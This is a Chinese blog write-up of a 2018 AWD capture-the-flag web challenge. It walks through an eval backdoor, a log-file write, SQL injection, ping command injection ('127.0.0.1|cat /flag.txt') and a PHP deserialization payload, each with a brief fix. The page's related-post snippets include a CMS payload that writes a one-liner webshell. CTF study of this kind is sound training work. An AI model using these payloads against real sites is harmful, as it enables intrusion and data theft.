2018领航杯awd简单复现

最新推荐文章于 2024-05-04 23:04:02 发布
最新推荐文章于 2024-05-04 23:04:02 发布
阅读量3.7k 收藏 9
点赞数 1
文章标签: 安全 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/122023748
版权

首先这里需要搭建一个cms的平台得到:

在这里插入图片描述

利用D盾进行漏洞扫描得到:

在这里插入图片描述

5级的eval后门漏洞

可以看到这里有一个5级的eval后门漏洞,我们查看文件得到源码:

在这里插入图片描述
这是一句话后门,我们利用一下这个后门得到:

在这里插入图片描述
这里能cat flag

修补增加过滤或者删除漏洞

2级的fwrite审计:

利用seay工具进行代码审计:
源码:

在这里插入图片描述
可以发现这是一个日志记录,但是它把记录的日志都写入到了
/var/www/html/log.php文件,这就造成文件写入漏洞

我们利用这个log1.php用get的方式写一个<?php phpinfo();?>
测试一下漏洞:

在这里插入图片描述

然后我们访问log.php文夹得到:

在这里插入图片描述
发现执行了phpinfo();

所以我们可以利用这个文件写入,去写入一句话木马

修复:

1、可以把log.php改成log.txt
2、增加危险字符过滤

2级漏洞eval(get_defined_vars()[’_GET’][‘cmd’]);

查看源码得到:

在这里插入图片描述get_defined_vars()此函数返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。

所有会获取所有的get方法,所有直接cmd执行命令:

在这里插入图片描述

修复:
1、进行危险字符过滤
2、把后门删除

在利用seay进行代码审计:

首先我们分析一下首页,index.php

在这里插入图片描述

发现包含了很多文件,这里有个/common/function.php文件
我们去访问这个文件得到:

在这里插入图片描述

可以看到这里把c作为一个对象,a作为一个方法进行调研

在index.php中可以看到,如果不给c传值会赋值为User
所有c的对象为User.php文件
所有看向User.php文件

在这里插入图片描述

我可以看到User这个类功还是挺多的,我们看向Login方法

在这里插入图片描述

sql注入

发现这里没有任何的过滤,所有登陆界面存在sql注入:

在这里插入图片描述
登陆得到:

在这里插入图片描述

修复:
进行危险字符过滤

命令执行

我在User.php看到:

在这里插入图片描述

看到这里有一个命令执行
我们在index.php哪里进行get请求
a=User&c=ping

在这里插入图片描述

然后在进行host请求:

在这里插入图片描述

发现执行了命令
利用命令:

127.0.0.1|cat /flag.txt

在这里插入图片描述

修复漏洞;
进行危险字符过滤

反序列化

在seay中全局查询反序列化函数得到:

反序列化漏洞源码:

在这里插入图片描述

payload:

class home{
    
    private $method;
    private $args; 
}
	$a = new home("ping",array('127.0.0.1|cat 	/flag.txt'));
	$b = serialize($a);
	echo base64_encode($b);

得到:

Tzo0OiJob21lIjoyOntzOjEyOiIAaG9tZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGhvbWUAYXJncyI7YToxOntpOjA7czoyNDoiMTI3LjAuMC4xfGNhdCAJL2ZsYWcudHh0Ijt9fQ==

在这里插入图片描述

得到flag。

漏洞修补:

过滤危险字符

本人比较菜漏洞审计就到这里,不妥的地方大佬勿喷

其它漏洞我也审计不出来直接上waf通防范。

南冥~
关注
记第一次线下AWD感受及复现
Lemon's blog
01-03 3090
前言: 之前忙于期末复习,没有及时总结当时参赛的感受及复现,这次就来总结一下。 前期准备 由于是第一次参加AWD比赛,各方面经验都不足,在参赛的前几天也是疯狂搜集各种脚本、框架、工具等,同时也参考大师傅的博客进行学习,下面就叙述一下我学习的过程: 一、进行备份 看了很多大师傅的博客,有的师傅博客中写到有些AWD比赛可能给的SSH账户密码相同,所以可以下载一些Github上修改SSH密码的批量脚本,...
awd的批量脚本 pwn_北极星 awd复现
weixin_39811101的博客
01-12 980
北极星 awd复现服务器共有3个web和一个pwnweb11,down下web1的源码,使用D盾扫描:2,漏洞1:发现三个冰蝎的木马,和一个一句话木马冰蝎的后门需要使用冰蝎的客户端进行连接:如图:一句话木马直接使用菜刀或蚁剑连接即可:3,漏洞2:sqlhelper.php的反序列化漏洞:构造payload:class A{public $name;public $male;function __...
苹果CMS网站awd复现
qq_48511129的博客
01-16 4379
D盾扫描无结果 漏洞一:自带大马后门 使用方法 漏洞二:前台rce 进行rce wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A} 进行攻击,该payload是直接生成一个c.php一句话木马文件,连接密码为c。 参考 https://blog.csdn.net/m0_37438418/artic
记录复现一下第一次awd
qq_63928796的博客
02-09 632
之前没打过awd,这次学长组织了一场awd娱乐赛,两个web一个pwn,还有一个黑盒,只会web,第一次啥也不会瞎打,被打烂了,不会写脚本,手交flag的感觉真“不错”,感觉awd还是比ctf好多了(虽然啥也不会),浅浅复现一下。
某线下赛AWD
weixin_30588907的博客
09-03 187
拿别人比赛的来玩一下,或许这就是菜的力量吧。 0x01 任意文件读取: 1 switch ($row['media_type']) { 2 case 0: // 图片广告 3 ...... 4 break; 5 case 2: // CODE 6 ...
浅谈AWD攻防赛的生存攻略
鹿鸣天涯
09-28 5308
AWD:Attack With Defence,即攻防对抗,比赛中每个队伍维护多台服务器(一般两三台,视小组参赛人数而定),服务器中存在多个漏洞(web层、系统层、中间件层等),利用漏洞攻击其他队伍可以进行得分,加固时间段可自行发现漏洞对服务器进行加固,避免被其他队伍攻击失分。
AWD监控脚本看别人怎么攻击你
09-05
监控的脚本,看别人怎么攻击你的 然后你抓到他的流量去攻击别人
应急挑战大学生网络安全邀请赛 AWD 靶机题目源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习...应急挑战大学生网络安全邀请赛 AWD 靶机题目源码+学习说明.zip
第一届长城 第三赛区 半决赛 AWD 源码
04-23
【标题】"第一届长城 第三赛区 半决赛 AWD 源码"指的是一个编程竞赛的源代码,很可能是参赛队伍在半决赛阶段使用的自动武器动态(AWD)系统的代码。这个标题揭示了这是一个与软件开发竞赛相关的内容,特别关注的是...
Metinfo 6.1.3 XSS漏洞分析
BerL1n
12-29 623
time: 2019-04-11 21:11 文章首发于安全客,Metinfo 6.1.3 XSS漏洞分析 前言 前段时间看到一个cms造成的xss漏洞,这里想分析下。这个漏洞是metinfo6.1.3版本因参数问题造成前台和后台引起了两处xss漏洞。 这个漏洞的影响范围一直到最新版本(6.1.3),因为前段时间爆出的漏洞,所以新版本应该已修复。 cms最新6.13下载地址:https://www.mituo.cn/download/ 前台漏洞分析( CVE-2018-20486) 通过在前台插入xss..
AWD比赛后门通用脚本
10-31
AWD比赛后门通用脚本 改一下IP和密码就好 适用于AWD混战
metinfo 6.0.0任意文件读取漏洞复现
SUPER131110的博客
09-01 349
设置了过滤条件,但是只设置了过滤"../"和“./”和请求头部是“http”开始,这样的过滤显然太简单了,我们可以用.\进行绕过构造payload。- 涉及的版本或软件(CMS版本、浏览器版本等)dir直接由_GET[‘dir’]传递进来。重现攻击过程所需的 payload。metinfo任意文件读取漏洞。简要解释漏洞产生的原因。打补丁,升级,上设备。
红蓝对抗-AWD全流程攻略06(起手防御)
最新发布
m0_67189356的博客
05-04 1388
awd 基础防御步骤
AWD-Test2
shinygod的博客
04-07 2944
00x1-eval后门 先用D盾扫一波 00x2-日志包含 原理: `log1.php``会把我们的请求以及其他的一些信息写进根目录下的log.php中。 然后我们进入log.php时,就会解析我们的shell了。 也就是有POST或者GET传参的地方,就能getshell 在任意位置添加一句话马,然后在/log.php,getshell 或者… 00x3-ping 在user.php中的ping,可以用管道来getflag 漏洞引发顺序: index.php中的$c值在function.p
AWD集锦
njh18790816639的博客
04-18 1231
前言 首先要尝试着去打AWD,不要不敢打,多打几遍就会打了,记得我第一次打的时候,Xshell就链了半个小时还没好,只有被动挨打的份,没有打别人的份!但这是成为大佬的必经之路。 弱口令 这个点是必须重视,基本每场比赛都有弱口令,有的还不止一个!所以我们要想办法去避免弱口令! 必须备份 这里必须备份!刚开始一直被打,所以直接全删,它就会扣你的分,所以我们不可以全删,不过我们是在一轮过后进行检测,或者实时检测!我们不能够删除文件,并且也不能够对代码进行注释!刚开始我删了代码,它给我扣分,我便重置了一次,扣了
CTF中PHP反序列化和命令注入的一次简单利用
weixin_30561425的博客
07-16 1333
代码来自第六届防灾科技学院网络安全技能大赛,侵删。 目标 获取Linux服务器根目录下的flag 代码 /*home.php*/ class home{ private $method; private $args; function __construct($method, $args) { $this->method = $metho...
php仿制网站,如何仿制网站(一模一样),制造后台管理系统CMS
weixin_30624185的博客
03-10 1812
如何仿制网站(一模一样),制造后台管理系统CMS2020 - 9 - 5 TAG :首先去找一个软件,大致是:网站整站下载工具,这个软件可以把网站所有的HTML页面下载下来,这个时候我们就得到了静态的HTML模版,自己把下载的模板整理下,因为一般下载的都很乱,把各个栏目的模板整理出来。接着:本地安装PHP运行环境,不会搭建环境的话,你百度搜索一下这个软件:PHP集成环境 类似的集成环境包有很多种,...
get_defined_vars() 函数
冷月醉雪的博客
04-24 701
查看更多 https://www.yuque.com/docs/share/6ef686e4-b03d-43c2-b74e-bde464d38ea0
[ctf web]web题中php经常遇到的函数
ShenZ的博客
07-24 1191
函数 substr call_user_func 把第一个参数作为回调函数调用 版本 说明 5.3.0 对面向对象里面的关键字的解析有所增强。在此之前,使用两个冒号来连接一个类和里面的一个方法,把它作为参数来作为回调函数的话,将会发出一个**E_STRICT**的警告,因为这个传入的参数被视为静态方法。 用call_user_func()来调用一个类里面的方法 <?php class myclass { static function say_hello() {
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值